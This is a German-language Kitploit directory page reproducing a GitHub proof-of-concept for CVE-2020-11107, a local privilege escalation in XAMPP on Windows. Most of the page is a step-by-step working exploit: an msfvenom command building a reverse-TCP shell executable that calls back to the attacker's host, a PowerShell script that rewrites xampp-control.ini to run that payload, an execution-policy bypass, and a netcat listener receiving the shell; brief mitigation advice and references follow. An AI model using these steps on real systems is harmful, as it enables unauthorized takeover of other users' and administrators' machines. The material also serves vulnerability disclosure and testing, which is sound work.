Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation — CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4 | Kitploit
Tools/GitHubGitHub/mohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation
Privilege EscalationPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubmohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation

Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

🧨 CVE-2020-11107 – Lokale Privilegienausweitung bei XAMPP (Windows)

📌 Überblick

CVE-2020-11107 ist eine Lokale Privilegienausweitungs-Schwachstelle (LPE) in Apache Friends XAMPP unter Windows.

Ein unprivilegierter Benutzer kann die Konfigurationsdatei des XAMPP-Kontrollpanels (xampp-control.ini) ändern und den standardmäßigen Editor (notepad.exe) durch eine schädliche ausführbare Datei ersetzen.
Wenn ein anderer Benutzer (z. B. Administrator) über das Kontrollpanel Protokolle öffnet, wird die schädliche Binärdatei mit den Privilegien des Opfers ausgeführt, was zu einer Privilegienausweitung führt.

❗ Diese Schwachstelle betrifft weder Linux noch macOS.


🎯 Betroffene Versionen

  • XAMPP < 7.2.29
  • XAMPP 7.3.x < 7.3.16
  • XAMPP 7.4.x < 7.4.4

Getestet auf

  • Windows 10
  • XAMPP 7.3.10

🧠 Ursache

  • xampp-control.ini ist global beschreibbar
  • Editor-/Browser-Pfade werden als vertrauenswürdig angesehen und ausgeführt
  • Konfigurationsänderungen wirken sich auf alle Benutzer aus
  • Keine Überprüfung der ausführbaren Pfade

🗂 Wichtige Dateien

root@kitploit:~
C:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe

🔍 Nachweis der Schwachstelle

XAMPP-Version prüfen:

root@kitploit:~
type C:\xampp\properties.ini

Beispielausgabe:

root@kitploit:~
base_stack_version=7.3.10-1
base_stack_platform=windows-x64

✅ Die Version ist anfällig.


⚔️ Schritte zur Ausnutzung (PoC)

1️⃣ Schädliche Payload generieren (Angreifer – Kali)

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe

2️⃣ Payload auf das Ziel übertragen

root@kitploit:~
mkdir C:\temp
# msf.exe nach C:\temp hochladen

3️⃣ XAMPP-Konfiguration ändern (Benutzer mit niedrigen Rechten)

Exploit-Skript (PowerShell):

root@kitploit:~
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

Skript ausführen:

root@kitploit:~
powershell -ExecutionPolicy Bypass -File 50337.ps1

4️⃣ Auslösung der Ausführung (Opfer / Administrator)

Das Opfer startet:

root@kitploit:~
C:\xampp\xampp-control.exe

Dann öffnet es eine beliebige Logdatei im Kontrollpanel.


5️⃣ Shell abfangen (Angreifer)

root@kitploit:~
nc -lvnp 4444

✅ Ergebnis:

root@kitploit:~
Connection received...
C:\WINDOWS\system32>

🎉 Privilegienausweitung erfolgreich


📈 Auswirkungen

  • Lokale Privilegienausweitung
  • Beliebige Befehlsausführung
  • Vollständige Systemkompromittierung (falls Administrator auslöst)

🛡 Abhilfe

  • XAMPP auf eine der folgenden Versionen (oder neuer) aktualisieren:

    • 7.2.29
    • 7.3.16
    • 7.4.4
  • Berechtigungen für folgende Datei einschränken:

root@kitploit:~
C:\xampp\xampp-control.ini
  • XAMPP-Kontrollpanel nicht als Administrator ausführen

📚 Referenzen

  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11107
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2020-11107
  • Apache Friends Advisory: https://www.apachefriends.org/blog/new_xampp_20200401.html
  • Exploit-DB: https://www.exploit-db.com/exploits/50337
  • Original Research: https://github.com/S1lkys/CVE-2020-11107
Tool herunterladen